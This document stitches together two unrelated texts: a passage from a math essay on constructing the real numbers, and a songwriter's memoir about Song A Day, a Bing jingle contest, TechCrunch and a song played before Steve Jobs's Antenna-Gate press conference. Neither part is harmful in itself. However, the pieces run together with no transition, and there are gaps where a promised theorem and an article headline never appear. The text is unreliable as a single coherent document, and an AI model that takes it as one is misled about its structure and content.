  By an equivalence class we mean the set of all the sequences that are equivalent to some particular sequence. Now, it can be shown that theset of all equivalence classes is a complete ordered field, if we define addition and multiplication on it in the right fashion. This proof, due to Cantor, is a slight modification of a proof that can be found in many analysis or topology books, showing that every metric space has a metric completion.

The other theorem is harder to prove, and I won't even sketch a proof here. In fact, this theorem is even difficult to state:

In particular, the decimal expansions, the Dedekind cuts, and the equivalence classes of Cauchy sequences, though they appear to be entirely different, all turn out to have the same arithmetic and algebraic structure -- they are really the "same" object. It is that object which we call the real number system.

Finally, the real definition of the reals

You might wonder why mathematicians want to use such a complicated definition. Wouldn't it be easier to simply define the real numbers to be the Dedekind cuts, or define the real numbers to be the decimal expansions, or something like that? That is the approach taken in some elementary textbooks, but ultimately it is less productive. When we actually use the real number system in proofs, the properties that we need are not specifically the properties of (for instance) Dedekind cuts or of decimal expansions. Rather, the properties we need are the axioms of a Dedekind complete ordered field. It is much simpler to think in terms of those axioms. To think of "numbers" as being cuts or expansions would just encumber us with extra baggage. The cuts or expansions are models -- they are useful for the job proving Theorem 1, but they are useful for little else. Once they've done that job, we can discard and forget them.

If you wish, you can now think of the points on a line asrepresenting the members of a Dedekind-complete ordered field. It is then correct to say that the real numbers are the points on a line.

When I started Song A Day in 2009, I was out of a job. I had been writing singing video game reviews for (the now defunct) 1up.com, and doing various freelance songwriting gigs — but I had nothing consistent.

About two months into the project, I discovered a website called OnlineVideoContests.com. All across the internet, every single week, there are literally thousands of video contests in various states of completion. I started entering them. A lot of them. I folded this practice right into song a day: 12 days, 12 contests. I’d win 2 or 3 out of the 12 and that was that. Pretty good money.

One of the contests I entered was a jingle competition for Microsoft’s recently launched search engine, Bing. The Bingle contest was simple: Make the best jingle and video showcasing Bing and win a $500 American Express gift card. It wasn’t a lot of money but the due date was just around the corner, and the contest would be decided by judges, not votes (these were my two biggest requirements for entering a contest) so banged out a song in under an hour and in another 45 minutes had posted my video. Another day, another contest.

About a week later, I found out that I won. On the one hand, this was surprising, because I thought that my song and video sucked, but on the other hand, my closest competition was a man staring into the camera singing, “You’ve got to Bing it Bing it, You’ve got to Bing it Bing it.”

A few days later, a friend linked me to an article on TechCrunch. MG Siegler, a preeminent tech writer, had written a scathing article with the headline:

Now, I’m quite used to being made fun of on the internet. It comes with the territory. The best thing you can do is ignore these types of comments. This was different though. TechCrunch was so high profile and MG was such a well known commentator that I felt like it begged a response. So I wrote a song about him, using text from his post as lyrics: “Sure, the song will get stuck in your head/ but so does the sound of seals barking or cows dying.”

I posted the song and sent it to him, and within minutes, my song-response was up on TechCrunch. He loved it even though (or maybe because) it made fun of him. This led to a strange relationship between me and TechCrunch — I was unofficially their official songwriter. Anytime I wrote about something tech related, I’d send it to MG and most of the time, he’d post it. I played at their annual “Crunchies” award show. I even learned that TechCrunch’s founder, the controversial Michael Arrington, used my MG Siegler song as his ringtone for a few months.

So. Fast forward to 2010. I had just learned that I lost a big video contest, and I was feeling pretty down. It also happened to be the eve of Apple’s “Antenna-Gate” press conference. The anti-Apple hype was at a fever pitch, and I thought the whole non-story was ridiculous. I decided to write a song defending Apple. I hoped that MG would post it, and maybe I’d get some decent traffic. I wrote the song in about 2 hours and spent another hour on the video. I posted the song, sent it to MG and went to bed.

The next morning I woke to a flurry of activity in my inbox, including an email that appeared to be from Apple. I read the email and decided it was fake — someone was trolling me. I was in the shower when my phone rang. It was Apple PR. For real. Could they use my video to open the press conference, they wondered? Um, yes. Sure, uh, how should I send it to you? Jesus Christ.

Later that morning, I watched online as the song and video I had made in 3 hours the night before played before an audience of journalists at Apple HQ. Then Steve Jobs came out on stage and said, “Thanks for coming. We found that on YouTube this morning and couldn’t help but want to share it.” It was one of the most surreal moments of my life. I heard later from the PR rep that Steve had been dancing off stage as the song played. If you watch the video of the event, there’s a few seconds, right as my song ends, that you can see him bopping his way on to the stage.

A few days after the keynote, I got commissioned to write a birthday song for Steve Wozniak. I was invited to his 60th birthday party, where I met the cofounder of TEDMED, who commissioned me to write a birthday song for the founder of TED, Richard Saul Wurman. The following year TEDMED had me back — this time performing songs written on-the-fly about the conference. This practice, fun songs written on the spot for conferences, company meetings and fun, has since become responsible for the bulk of my income.

When I look back and trace the lines that lead me here, from unemployment and song a day, to the video contests, to Bing, TechCrunch, and Steve Jobs, The Woz, TEDMED and my current gig, it’s dizzying.

And it all came from making and sharing with abandon on the internet.